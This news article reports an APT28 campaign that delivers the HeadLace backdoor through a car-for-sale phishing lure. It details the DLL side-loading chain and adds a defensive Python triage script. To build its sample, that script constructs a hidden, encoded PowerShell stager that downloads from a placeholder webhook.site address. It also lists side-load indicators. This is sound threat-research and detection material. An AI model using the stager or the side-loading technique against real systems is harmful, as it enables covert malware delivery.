
APT28 Uses HeadLace Malware to Target Diplomats Through a Car-for-Sale Phishing Lure

A Russia-linked threat actor has been tied to a recent campaign that used a car-for-sale advertisement as a phishing lure to deliver a modular Windows backdoor named HeadLace.

“The campaign likely targeted diplomats and began as early as March 2024,” Palo Alto Networks Unit 42 stated in a report published today, linking it with medium to high confidence to APT28, also known as BlueDelta, Fancy Bear, Fighting Ursa, Forest Blizzard, FROZENLAKE, Iron Twilight, ITG05, Pawn Storm, Sednit, Sofacy, and TA422.

The car-for-sale lure is not new: another Russian state-sponsored group, APT29, has used the same theme since July 2023, which suggests that APT28 is repurposing a tactic that has already proven effective for its own campaigns.

Earlier in May, the threat actor was implicated in a series of campaigns targeting networks across Europe with the HeadLace malware and credential-harvesting web pages.

The attacks rely on webhook[.]site, a legitimate service that, together with Mocky, has become a signature of APT28's operations. The actor uses it to host a malicious HTML page that first checks whether the visitor's machine runs Windows and, if so, offers a ZIP archive for download (“IMG-387470302099.zip”).

If the system is not Windows-based, the page instead redirects to a decoy image hosted on ImgBB, a photo of an Audi Q7 Quattro SUV.

The archive contains three files: the genuine Windows Calculator executable renamed to look like an image (“IMG-387470302099.jpg.exe”), a DLL (“WindowsCodecs.dll”), and a batch script (“zqtxmo.bat”).

When the victim opens the renamed calculator, it side-loads the malicious DLL: Windows searches the executable's own directory before the system directories for a DLL that is not already loaded, so the bundled “WindowsCodecs.dll” is picked up in place of the legitimate one. The DLL is a component of the HeadLace backdoor whose job is to run the batch script, which in turn executes a Base64-encoded command that fetches a file from a second webhook[.]site URL.

That file is saved as “IMG387470302099.jpg” in the user's Downloads folder, renamed to “IMG387470302099.cmd”, executed, and then deleted to remove traces of the activity.
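The chain above lends itself to static triage of the lure archive before anything is executed. The script below is an added example, not code from the article or from Unit 42: it builds a ZIP in memory that mirrors the three-member layout described above (placeholder PE bytes stand in for calc.exe and the DLL, and the batch script is assumed to carry a PowerShell -EncodedCommand line, since the page does not reproduce the real script) and then flags the structural indicators a responder would look for: a double extension ending in an executable type, a DLL whose name matches a known side-load target sitting next to an executable, and a Base64-encoded command in a batch file, which it decodes and mines for URLs. The indicator list and the sample contents are assumptions; the webhook.site URL in the sample is a constructed placeholder.

```python
"""Static triage of a HeadLace-style lure archive (added example, not the
article's or Unit 42's code). The sample archive and the batch script's
exact form are constructed assumptions."""
import base64
import io
import re
import zipfile

EXEC_EXT = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".dll"}
DECOY_EXT = {".jpg", ".jpeg", ".png", ".gif", ".pdf", ".doc", ".docx", ".txt"}
SCRIPT_EXT = {".bat", ".cmd"}
# DLL names that trusted Windows binaries resolve from their own directory
# first; WindowsCodecs.dll is the one the article names (extend as needed).
SIDELOAD_DLLS = {"windowscodecs.dll"}
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
URL_RE = re.compile(r"https?://[^\s'\"<>]+")


def build_sample_archive() -> bytes:
    """Constructed sample: calc.exe stand-in, side-loaded DLL, batch stager."""
    stage2 = ("iwr https://webhook.site/EXAMPLE -OutFile "
              "$env:USERPROFILE\\Downloads\\IMG387470302099.jpg")
    # PowerShell's -EncodedCommand takes Base64 of UTF-16LE text (assumed form).
    encoded = base64.b64encode(stage2.encode("utf-16-le")).decode()
    bat = f"@echo off\r\npowershell -NoP -W Hidden -EncodedCommand {encoded}\r\n"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("IMG-387470302099.jpg.exe", b"MZ" + b"\x00" * 62)  # placeholder PE
        zf.writestr("WindowsCodecs.dll", b"MZ" + b"\x00" * 62)         # placeholder PE
        zf.writestr("zqtxmo.bat", bat)
    return buf.getvalue()


def _basename_exts(member: str):
    """Lower-cased file name and its full chain of extensions."""
    base = member.rsplit("/", 1)[-1].lower()
    return base, ["." + p for p in base.split(".")[1:]]


def decode_embedded_base64(text: str):
    """Yield (token, decoded_text) for every long Base64 run in a script."""
    out = []
    for tok in B64_RE.findall(text):
        try:
            raw = base64.b64decode(tok + "=" * (-len(tok) % 4), validate=True)
        except ValueError:
            continue
        # Mostly-zero high bytes mean UTF-16LE (PowerShell -EncodedCommand).
        if len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4:
            decoded = raw.decode("utf-16-le", errors="replace")
        else:
            decoded = raw.decode("utf-8", errors="replace")
        out.append((tok, decoded))
    return out


def triage_archive(data: bytes):
    """Return a list of (indicator, detail) pairs for a ZIP archive."""
    findings, exes, dlls = [], [], []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for member in zf.namelist():
            base, exts = _basename_exts(member)
            # e.g. IMG-....jpg.exe: an executable pretending to be a picture
            if len(exts) >= 2 and exts[-1] in EXEC_EXT and exts[-2] in DECOY_EXT:
                findings.append(("double_extension", member))
            if exts and exts[-1] == ".exe":
                exes.append(member)
            if base in SIDELOAD_DLLS:
                dlls.append(member)
            if exts and exts[-1] in SCRIPT_EXT:
                text = zf.read(member).decode("utf-8", errors="replace")
                for _tok, decoded in decode_embedded_base64(text):
                    findings.append(("encoded_command", {
                        "script": member,
                        "decoded": decoded,
                        "urls": URL_RE.findall(decoded),
                    }))
    # A side-load target DLL shipped beside any executable in the same archive
    for dll in dlls:
        for exe in exes:
            findings.append(("sideload_pair", f"{exe} + {dll}"))
    return findings


if __name__ == "__main__":
    for indicator, detail in triage_archive(build_sample_archive()):
        print(indicator, detail)
```

Point `triage_archive` at the bytes of a real archive to use it; the Base64 decoder deliberately tries UTF-16LE before UTF-8 because encoded PowerShell is the common case in batch stagers, and a decoded stage-two command is usually where the next hosting URL (here, the second webhook[.]site address) shows up.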

“While the infrastructure used by Fighting Ursa varies for different attack campaigns, the group frequently relies on these freely available services,” Unit 42 stated. “Furthermore, the tactics from this campaign align with previously documented Fighting Ursa campaigns, and the HeadLace backdoor is unique to this threat actor.”
